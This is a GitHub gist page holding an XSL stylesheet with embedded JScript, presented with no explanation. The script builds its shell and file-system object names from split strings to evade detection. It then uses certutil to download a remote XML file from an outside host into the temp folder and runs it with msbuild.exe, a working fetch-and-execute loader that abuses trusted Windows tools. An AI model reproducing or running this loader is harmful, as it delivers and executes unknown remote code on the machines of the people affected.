Skip to content

Instantly share code, notes, and snippets.

@iam1980
Last active May 1, 2018 12:19
Show Gist options
  • Save iam1980/42a04dbf6f9251de0c1a845a02659258 to your computer and use it in GitHub Desktop.
Save iam1980/42a04dbf6f9251de0c1a845a02659258 to your computer and use it in GitHub Desktop.
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
function i() {
var a = "";
var p = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < 5; i++)
a += p.charAt(Math.floor(Math.random() * p.length));
return a;
}
var fdsafdsa = new ActiveXObject(("WS"+"cr"+"ipt.Sh"+"el"+"l"));
sf = new ActiveXObject(("Scr"+"ip"+"ting.Fi"+"le"+"Sys"+"temObje"+"ct"));
tm = sf.GetSpecialFolder(2);
var ii = i();
fdsafdsa.Run(("certutil -urlcache -split -f https://www.evo-designs.net/ir.xml?lrt=18547 "+tm+"\\"+ii+".xml"), 0, true);
fdsafdsa.Run(("C:\\Win"+"dows\\Microsoft.N"+"ET\\Framework\\v"+"4.0.30319\\ms"+"bui"+"ld.exe "+tm+"\\"+ii+".xml"), 0, false);
]]> </ms:script>
</stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment